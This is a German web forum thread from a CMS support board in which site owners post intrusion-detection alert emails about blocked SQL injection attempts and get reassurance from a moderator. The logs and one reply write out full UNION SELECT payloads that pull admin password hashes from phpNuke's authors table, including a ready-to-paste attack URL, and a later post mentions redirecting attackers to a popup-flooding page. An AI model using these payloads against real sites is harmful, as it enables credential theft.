Hack detected

Begonnen von fjuergens, 17 April 2006, 20:48:14

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

fjuergens

Hallo zusammen,
was ist das bzw. was fange ich damit an ???
Handelt sich um eine Domain von einer Freundin.
Sie hat folgende Mail erhalten:

12-04-2006 11:35:21 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[name] = Search 
_POST[query] = test 
_POST[type] = comments 
_POST[sid] = 0' UNION SELECT pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          87.120.5.2
QUERY_STRING:         name=Search
REQUEST_URI:          /welt/modules.php?name=Search
REMOTE_PORT:          44343
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
HTTP_X_FORWARDED_FOR: 87.120.87.178

siteadress: http://www.gabyswelt.info/welt

Danke im voraus
mit netten Grüßen aus Athen / GR
F.Juergens

RiotheRat

Es hat jemand verrsucht über die Suche das System Deiner Freundin zu hacken. Er wollte gerne das Adminpasswort wissen  ;D Das System hat den Hack erkannt, geblockt und als Resultat diese Mail rausgehauen um darüber zu informieren dass ein gblockter Angriff  ::) stattgefundfen hat.

Du und die Freundin müssen sich also keinen Kopf machen ... ein  sinnloser, geblockter Hack ...

RtR
Unaufgeforderte PNs & Emails werden ignoriert

Erst wenn die letzte Zeile Code verhunzt, der letzte Server gehackt und der letzte Script-Kidde befriedigt ist, erst dann, werdet Ihr feststellen, dass Nuke nicht sicher ist...

fjuergens

Hallo Rio,
Danke für die schnelle Antwort
mit netten Grüßen aus Athen / GR
F.Juergens

Puschel

Hatte heute ähnlichen Fall und wunderte mich auch erst über die Mail. Aber gibt ja zum Glück die Suche hier :).
Das hier stand drin:

19-04-2006 00:24:49 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories 
_GET[topic] =   
_GET[category] = 0 
_GET[days] = 0 
_GET[sid] = 0 
_GET[name] = Search 
_GET[query] = p0gg0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.96.245.201
QUERY_STRING:         type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          2913
REMOTE_HOST:         
HTTP_REFERER:         http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP_X_FORWARDED_FOR:




Ist die "REMOTE_ADDR" die IP von dem, der den Hack versucht hat? Würde es dann was bringen, diese zu sperren? Oder kann man sich das im Prinzip sparen, da er im Pragma auch beim nächsten Mal keinen Erfolg haben wird? :)
Durch das Brett vorm Kopf hat man den Zahnstocher immer griffbereit

Andi

Hi :)

die ip zu sperren bringt nix, beim nächsten mal hat der ne andere....

Der "Hacker" war ein ahnungsloser doofer scriptkiddie, der den Exploit von waraxe's advisory 1:1 übernommen hat. Manche meinen, wenn sie irgendwo was aufschnappen können sie gleich die halbe Welt hacken....

[waraxe-2006-SA#046] - Critical sql injection in phpNuke 7.5-7.8
http://www.waraxe.us/advisory-46.html
schön´s Grüssle, Andi

NeMeSiSX2LC

Gibt aber leider auch durchaus Seiten wo dieser "hack" greift... :(

Also keine MX, die armen Nuker.... :D
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

Andi

Trotzdem doofer Scriptkiddie, der nichtmal sieht ob er phpnuke oder sonstwas vor sich hat...  :)
Bekomme die mails ja fast immer in Kopie und zu 95% sind die Angriffe die Standardtexte per cut & paste in die Browserzeile gehackt, oder diese idiotischen Standardhackerformulare wo alle möglichen Nuke-Hacks interaktiv aufgelistet sind. Die Dummköppe machen sich nichtmal die Mühe den richtigen Tabellenprefix zu ermitteln, was ja in Nuke kein Problem ist....
schön´s Grüssle, Andi

Puschel

Naja, aber scheinbar lernt er nicht aus seinen "Fehlern"... Da eben wieder eine Mail kam, vermute ich mal, da ist der gleiche am Werk:

20-04-2006 18:41:25 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories 
_GET[topic] =   
_GET[category] = 0 
_GET[days] = 0 
_GET[sid] = 0 
_GET[name] = Search 
_GET[query] = g0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.97.108.5
QUERY_STRING:         type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          4101
REMOTE_HOST:         
HTTP_REFERER:         http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
HTTP_X_FORWARDED_FOR:


siteadress: http://www.gamezcheck.de




Sieht dem letzten Versuch doch sehr ähnlich ;)
Durch das Brett vorm Kopf hat man den Zahnstocher immer griffbereit

Andi

Wie bereits gesagt, diese mails bekomme ich (bzw. das ganze team) zu dutzenden am Tag.
Vergesst es einfach, den Schitt braucht ihr hier nicht zu posten, sonst haben wir bald das Forum damit voll....

Jeder Depp kann das sein, er braucht deine Seite einfach nur mit dieser URL aufrufen:

http://www.deineseite.tld/modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNI0N+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*

Wenn sich das häuft und du die Benachrichtigung nicht erhalten willst, so kannst du das in der /includes/detection/config.php abschalten.// mailadressen, wo die Detection hinversendet werden soll
// weitere Adressen können nach dem gleichen Schema zugefügt werden
// um kein Mail zu versenden, einfach diese Zeilen auskommentieren oder löschen
$conf['sendmail'][] = $GLOBALS['adminmail']; // Standardadminmailadresse, kann auch mit anderem Wert belegt werden :-))
$conf['sendmail'][] = 'ids@pragmamx.org';    // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll


Ich vermute mal, dass die meisten Idioten, die das probieren, garnicht wissen, was sie als Ergebnis bekommen könnten. Selbst wenn, dann bekämen die nur die Adminpasswörter als md5-hash. Das nützt denen bei pragmaMx auch nix, weil die damit keinen Admincookie fälschen können. Den gibt es im pragmaMx nämlich garnicht...
schön´s Grüssle, Andi

Okimen

Hallo Ihr lieben,
ist aber trotz allem sehr schön und sehr beruhigend dies zu lesen. Vor allem wenn man wie ich bzw. meine damals noch php-nuke seiten zweimal gehackt wurden.
Das ganze ist jetzt ca.3 Wochen her, und wirklich verdammt beruhigend. Macht mut neue und weitere Sachen zu probieren, ohne das man Angst haben muss, das irgendein Hacker oder Möchtegernhacker einem das wieder zerstört.

Danke für diese Beruhigung!

VG Dirk ;D

Andi

Hi :)

nunja, das bedeutet aber keine 100%ige Sicherheit, gelle  ;) ;)
schön´s Grüssle, Andi

Okimen

Hallo Andi,
gut, aber was ist heute schon 100%ig? Oft reichen ja 98% ;) ;D

VG Dirk

--helmi-



Hi Andi..

Zur Zeit häufen sich diese Atacken wieder bei mir..  :D
Und so überlege ich, ob es nicht möglich wäre, diese Jungs auch mal etwas zu ärgern..
oder zumindest zu verwirren: Wäre es möglich bei solchen Angriffen eine bestimmte Seite zu öffnen..?
Meinetwegen in der Art von:  Wir kennen Dich: Hier ist deine IP, dein OS, dein Browser, dein "C:\ - Verzeichnis" (soll ja mit JS ganz einfach gehen..!?) ..   Jetzt wird Deine Pladde formatiert.. usw..   ;D 8) :)

Wäre sowas (mit wenig Aufwand) möglich..?   ::) ;)

---


*******************
Viele Grüße: --helmi- !


>>---Mission Control 42 -->


---

Andi

Moin :)

meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Wenn ja, kannst du einfach auf eine andere Seite umleiten, indem du die /includes/detection/config.php anpasst:
// Weiterleiten auf andere Seite oder leerlassen um mit Fehlermeldung direkt abzubrechen
$conf['redirect'] = 'http://www.google.de/'; #


Standardmässig wird da auf die index.php umgeleitet, da kannst du aber jede x-beliebige Seite einsetzen.
Heheeee, z.B. auf diesen Thread ;)
schön´s Grüssle, Andi

--helmi-

MoinMoin Andi  ;) :)

ZitatMoin
meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Naja.. manche Kiddies wirds vielleicht beieindrucken..?  ::)
Sind ja IMHO nicht alles "Profis" / Freaks..   Denke (hoffe) mal das der Großteil der Atacken von eher unbedarften Kiddies kommt, die irgendwelche Instant-Scripte alle mal der Reihe nach anklicken / probieren..  ::) ;)

Danke mal für Deinen Code-Tipp! werds mal verwurschteln!
Wenn  dann irgendwelche Häufungen von Panikatacken bei den Kiddies bekannt werden, geb ich hier nochmal Bescheid.. *lol*  ;D







*******************
Viele Grüße: --helmi- !


>>---Mission Control 42 -->


---

Okimen

Hallo,
gut "Profis" würde das wohl kaum erschrecken, aber bei den "Kiddis" die da meinen sie könnten die ganze Welt hacken, stelle ich mir das schon komisch vor!

Viel Spaß!

VG Dirk

NeMeSiSX2LC

Wenn ich diese Meldung so sehe dann ist das doch ne Aktuelle von **** Und es gibt echt Seiten  wo das geht (Nuke) Bloss bissel ahnung müsste derjenige doch haben. Sonst kann er mit dem Resultat nix anfangen ;)
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

Andi

Klar funktioniert das in phpNuke ;)

Aber etliche Leute haben immer noch nicht kapiert, dass pragmaMx mit nuke genauso viel gemeinsam hat, wie postNuke. Ob die postNuke Jungs auch so unter dieser beschissenen Erblast leiden müssen....
schön´s Grüssle, Andi

m-t

Zitat von: Andi am 29 April 2006, 19:28:58
meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay

weitergeleitet,

Vorsicht lieber nicht aufrufen! Es öffnen sich ca. 1800 Fenster. Den PC kannst dann neu starten da kommt kein PopUp Blocker mit :-)

Seitdem ich das drinhatte haben sich die Hackversuche in Minutenabständen etwas verringert, beeindrucken kann ich niemand damit das is klar. Aber ein bischen Schadenfreude ist schon dabei.

Apfelkomplott

Zitat von: m-t am 01 Mai 2006, 11:17:22Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay
Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)